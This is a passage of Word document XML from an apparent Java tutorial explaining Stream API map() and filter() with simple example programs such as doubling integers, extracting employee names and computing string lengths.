          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> passed to the map() method is applied to each element of the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CF6F2E" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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returns a new stream of the transformed data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E93F08"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1: Basic usage of map() to transform elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C23F18B"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Let's say we have a list of integers, and we want to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>double each number</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F640F4"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s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2726BA37"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st;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C2A733"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stream.Collectors;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D95137D" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B197295"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pExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4DA59B"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7FD6FF3A"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Integer&gt; numbers = Arrays.asList(1, 2, 3, 4, 5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760A3EB1"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213F86D"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se map to double each number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532E2545"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Integer&gt; doubledNumbers = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C58A056"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n -&gt; n * 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0BCCAC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B7BC9F"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DCC0D4F"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doubledNumbers);  // Output: [2, 4, 6, 8, 10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5827589A"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87F0207"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B7DD0F0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C54D8B" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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e use the map() function to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiply each element by 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003CBCD8" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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result is a new list of doubled numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35255ACC"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2: Using map() to extract properties from objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75192404"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ssume we have a list of Employee objects, and we want to extract the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>names of employees</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> into a new list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6087A8DC"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s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F65E00E"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st;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125154A7"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stream.Collectors;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55293CCB" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A0E2571"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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBF36E4"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A9B6AC"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6D1C96A"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mployee(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0928B4C3"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AB5ABA"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DC4931F" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="394CE859"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ring getName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567A813D"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BCD202"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AD17031"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FC9DCFE" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E2FEA44"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pExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3B256A"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4B17573B"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Employee&gt; employees = Arrays.asList(new Employee("John"), new Employee("Alice"), new Employee("Bob"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597A58DC"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5AFD560"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se map to extract names from Employee objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05999B78"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String&gt; names = employees.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EE0B08"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Employee::getName)  // method reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772A13D6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2447E22B"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4BC54F9"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names);  // Output: [John, Alice, Bob]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7814CDFD"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12F54BA"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FD23A1D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0C3C81" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98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e use the map() function to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>extract the names</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from a list of Employee objects using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method reference</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Employee::getName).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737A1620"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3: Mapping to a different type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAFADBB"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 also map an object to a completely different type, such as converting a list of strings into a list of their lengths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A8AC2F"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s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE26B54"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st;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053C50B5"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stream.Collectors;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F0E566" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="359D7C5B"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pExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B88419"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42B0B981"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String&gt; words = Arrays.asList("apple", "banana", "cherry");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C95E9C" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="183F4ADC"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se map to get the length of each string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2798A3"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Integer&gt; wordLengths = words.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D178054"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String::length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A2EB8F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A33AD03" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B80FA51"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wordLengths);  // Output: [5, 6, 6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0FF867"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5B94E60"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100933E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1D673F" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99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e used map() to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transform</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> each string into its </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>length</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290EBECB"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35BA4298" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ap()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a stream operation that applies a transformation function to each element in the stream, producing a new stream with the transformed elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45999AAF" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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is used when you want to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>modify</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transform</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the elements of a stream into something else, such as converting objects to other objects, or extracting a specific property (like a field or method result).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D000C5" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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result of map() is a new stream; it does not modify the original stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA1EB1F" w14:textId="7BA242E8" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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248BDB3">
          <v:rect id="_x0000_i1688" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02500336" w14:textId="77777777" w:rsidR="00520371" w:rsidRPr="00CE4B95" w:rsidRDefault="00520371">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="221" w:name="_Toc196307701"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the filter in the stream?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="221"/>
    </w:p>
    <w:p w14:paraId="50CC675D" w14:textId="2159C154" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">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filter()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> function in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>predicate-based operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>select elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from a stream based on a condition. It filters the elements of the stream, retaining only those that match a specified condition (predicate). It is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stream API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>remove</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> unwanted elements from a stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA63AC5"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yntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20296532"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eam&lt;T&gt; filter(Predicate&lt;? super T&gt; predicate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1BE988" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The type of elements in the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDAF35B" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99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edicate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Predicate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> function that returns true for elements that should be kept in the stream, and false for elements that should be excluded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B6A1BC"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The filter() function </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>does not modify the original stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> but instead returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that contains only the elements that satisfy the given condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77675B32"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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53228C51" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the stream based on a condition (predicate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6DE2B4" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> containing only the elements that match the predicate.</w:t>
      </w:r>
    </w:p>
